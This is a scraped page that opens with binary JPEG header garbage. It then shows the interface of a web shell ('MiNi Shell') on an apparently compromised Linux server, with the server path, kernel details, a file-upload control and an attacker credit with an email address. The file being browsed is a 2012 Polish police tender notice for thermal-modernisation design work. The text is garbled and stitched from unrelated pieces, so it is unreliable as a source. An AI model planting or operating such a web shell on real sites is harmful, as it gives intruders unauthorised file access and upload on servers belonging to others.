JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120413/117102-N-2012.html

<p class="kh_header"><b>Rzeszów: Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji wybranych budynków Komendy Wojewódzkiej Policji w Rzeszowie</b><br>
<b>Numer ogłoszenia: 117102 - 2012; data zamieszczenia: 13.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Dąbrowskiego 30, 35-036 Rzeszów, woj. podkarpackie, tel. 017 8582192, faks 017 8582193.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podkarpacka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji wybranych budynków Komendy Wojewódzkiej Policji w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji wybranych budynków Komendy Wojewódzkiej Policji w Rzeszowie, tj.
1)budynków Komendy Powiatowej Policji w Stalowej Woli, ul. Popiełuszki 24, 
37 - 450 Stalowa Wola,
2)budynku Posterunku Policji w Zaklikowie, ul. Zachodnia 25, 37 - 470
 Zaklików,
3)budynków Posterunku Policji w Radomyślu nad Sanem, ul. Rynek Duży 10, 37 - 455 Radomyśl nad Sanem.

2. Zamówienie podzielone zostało na trzy zadania:
- Zadanie nr 1 - Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków Komendy Powiatowej Policji w Stalowej Woli, 
ul. Popiełuszki 24, 37 - 450 Stalowa Wola,
- Zadanie nr 2 - Opracowanie dokumentacji projektowo - kosztorysowej dla robót
budowlanych polegających na wykonaniu termomodernizacji budynku Posterunku Policji w Zaklikowie, ul. Zachodnia 25, 37 - 470 Zaklików,
- Zadanie nr 3 - Opracowanie dokumentacji projektowo - kosztorysowej dla robót
 budowlanych polegających na wykonaniu termomodernizacji budynków Posterunku Policji w Radomyślu nad Sanem, ul. Rynek Duży 10, 37 - 455 Radomyśl nad Sanem.

3.Dla wszystkich budynków, dla których należy wykonać dokumentację projektowo - kosztorysową, zostały opracowane audyty energetyczne stanowiące Załączniki nr 1A-1C do Załącznika nr 1 do Specyfikacji Istotnych Warunków Zamówienia - Opis przedmiotu zamówienia.
4. W celu dokonania weryfikacji zakresu oraz sposobu realizacji przedmiotu zamówienia, Zamawiający zaleca, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej przedmiotowych budynków oraz uzyskał wszelkie inne niezbędne informacje, które mogą być konieczne do przygotowania oferty oraz należytego wykonania przedmiotu zamówienia. W tej sprawie należy się kontaktować telefonicznie z Panem Wojciechem Kolbuszem, od poniedziałku do piątku w godzinach od 7:30 - 15:00 (tel. 17 858 2567).
5. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium.
2.Wysokość wadium:
- Zadanie nr 1: 1 220,00 zł
- Zadanie nr 2: 600,00 zł
- Zadanie nr 3: 720,00 zł
3.W przypadku złożenia oferty na więcej niż jedno zadanie - kwota wadium musi stanowić sumę wymaganych wartości w odniesieniu do wybranych przez Wykonawcę zadań. 
4.Z treści dokumentów stanowiących potwierdzenie wniesienia wadium musi jednoznacznie wynikać, na jakie zadania Wykonawca wniósł wadia i w jakiej wysokości.  
5.Wadium może być wniesione w :
- pieniądzu   - wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
   NBP O/O w Rzeszowie nr 10 1010 1528 0004 0413 9120 0000.

- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
kredytowej, z  tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
  ustawy   z   dnia   9   listopada   2000   roku   o   utworzeniu  Polskiej  Agencji
  Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

6.Wadium wnoszone w  innej   formie niż pieniężna należy zdeponować w kasie Komendy  Wojewódzkiej  Policji  w Rzeszowie,   ul.  Dąbrowskiego   30,   budynek  A,   II   piętro.    Kasa czynna jest od poniedziałku do piątku w godz. od 10: 00 do 13:00. 
7.Wadium wnoszone w  formie poręczenia  i  gwarancji  musi  zawierać  stwierdzenie,  że na pierwsze  pisemne   żądanie   Zamawiającego   wzywające   do   zapłaty   wadium, zgodnie z   warunkami   przetargu,   następuje   jego   bezwarunkowa   wypłata   bez jakichkolwiek zastrzeżeń.  
8. Zamawiający   zatrzyma  wadium w  przypadku   zaistnienia   okoliczności   jego zatrzymania opisanych w art. 46 ust. 5 ustawy Pzp. Przy ustalaniu zaistnienia przesłanek z art. 46 ust. 4a ustawy Pzp Zamawiający będzie opierał się na opinii Urzędu Zamówień Publicznych, która jest udostępniona pod adresem: http://www.uzp.gov.pl/zagadnienia-merytoryczne/prawo-polskie/opinie prawne/aktualne/zatrzymanie-wadium. 
9. Wadium wnosi się przed upływem terminu składania ofert, tj. wadium musi być złożone lub wpłynąć   na   rachunek   Zamawiającego   przed   upływem  terminu   składania   ofert   i musi obejmować cały okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku, do oferty należy załączyć oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku udziału w postępowaniu, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na:
a)opracowaniu dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków, o wartości robót co najmniej 40 000,00 zł brutto (dotyczy zadania nr 1),
b)opracowaniu dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków, o wartości robót co najmniej 20 000,00 zł brutto (dotyczy zadania nr 2),
c)opracowaniu dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków, o wartości robót co najmniej 25 000,00 zł brutto (dotyczy zadania nr 3).
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku, do oferty należy załączyć oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku udziału w postępowaniu, jeżeli Wykonawca wykaże, że:
 a)będzie dysponować podczas realizacji zamówienia co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i co najmniej 3 - letnie doświadczenie zawodowe w projektowaniu w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
b)będzie dysponować podczas realizacji zamówienia co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno - budowlanej i co najmniej 3 -  letnie doświadczenie zawodowe w projektowaniu w specjalności konstrukcyjno - budowlanej,
c)będzie dysponować co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i co najmniej 3 - letnie doświadczenie zawodowe w projektowaniu w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d)będzie dysponować podczas realizacji zamówienia co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej i co najmniej 3 -  letnie doświadczenie zawodowe w projektowaniu w specjalności architektonicznej.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku, do oferty należy załączyć oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczenia i załączonych do oferty dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian w umowie w stosunku do treści oferty,  w przypadku zaistnienia co najmniej jednej  z okoliczności wymienionych poniżej:
1)wydłużenia terminu realizacji o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy, w przypadku:
a)siły wyższej,
b)wydłużenia ustawowych terminów przez organy administracyjne wydające niezbędne uzgodnienia i warunki, pod warunkiem złożenia dokumentów przez Wykonawcę w odpowiednim czasie, uwzględniającym złożone w umowie terminy,
2)zmian kluczowych specjalistów:
a)na wniosek Wykonawcy z powodu:
- śmierci, choroby lub z powodu innych zdarzeń losowych dotyczących kluczowego specjalisty,
- nie wywiązywania się kluczowego specjalisty z obowiązków wynikających się z umowy,
- jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacja itp.),
b)na żądanie Zamawiającego, jeżeli uzna, że kluczowy specjalista nie wykonuje swoich obowiązków wynikających z umowy; zmiany takiej Wykonawca winien dokonać w terminie wskazanym przez Zamawiającego.
W przypadku zmiany ww. osób, kompetencje nowych osób muszą odpowiadać
zakresem osobom zmienianym.
3)w przypadku zmiany regulacji prawnych wprowadzonych po dacie podpisania umowy wywołującej potrzebę zmian treści umowy wraz ze skutkami wprowadzenia takiej zmiany.
2.Zmiana osób wyznaczonych do koordynacji wykonywania dokumentacji może być dokonana pisemnie na wniosek Wykonawcy lub Zamawiającego jedynie  w uzasadnionych i udokumentowanych przypadkach: śmierci lub choroby lub innych udokumentowanych pisemnie ważnych przyczyn. Zmiana może zostać dokonana pod warunkiem zapewnienia osoby do realizacji przedmiotu umowy o wykształceniu 
idoświadczeniu zgodnym z wymaganiami przedstawionymi w rozdziale V, punkt 1, 
ppkt 3).
3. Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie  pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. podkarpacka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych i Funduszy Pomocowych,
Komenda Wojewódzka Policji w Rzeszowie,
ul. Dąbrowskiego 30,
35 - 036 Rzeszów,
budynek B, I piętro, pokój nr 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 11:00, miejsce: Wydział Zamówień Publicznych i Funduszy Pomocowych,
Komenda Wojewódzka Policji w Rzeszowie,
ul. Dąbrowskiego 30,
35 - 036 Rzeszów,
budynek B, I piętro, pokój nr 116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że dokumentacja projektowo - kosztorysowa dla robót budowlanych polegających na wykonaniu termomodernizacji wybranych budynków Komendy Wojewódzkiej Policji w Rzeszowie, będących przedmiotem zamówienia, będzie służyła Zamawiającemu do:
- opracowania studium wykonalności projektu termomodernizacji wybranych budynków KWP w Rzeszowie,
- opracowania wniosku aplikacyjnego na Konkurs o dofinansowanie ze środków EFRR w ramach RPO Województwa Podkarpackiego na lata 2007-2013 tj. Osi priorytetowej II Infrastruktura techniczna, Działania 2.2 Infrastruktura energetyczna.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków Komendy Powiatowej Policji w Stalowej Woli, 
ul. Popiełuszki 24, 37 - 450 Stalowa Wola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji  budynków Komendy Powiatowej Policji w Stalowej Woli, ul. Popiełuszki 24, 37 - 450 Stalowa Wola.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynku Posterunku Policji w Zaklikowie, ul. Zachodnia 25, 37 - 470 Zaklików.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynku Posterunku Policji w Zaklikowie, ul. Zachodnia 25, 37 - 470 Zaklików.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków Posterunku Policji w Radomyślu nad Sanem, ul. Rynek Duży 10, 37 - 455 Radomyśl nad Sanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: opracowanie dokumentacji projektowo - kosztorysowej dla robót budowlanych polegających na wykonaniu termomodernizacji budynków Posterunku Policji w Radomyślu nad Sanem, ul. Rynek Duży 10, 37 - 455 Radomyśl nad Sanem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com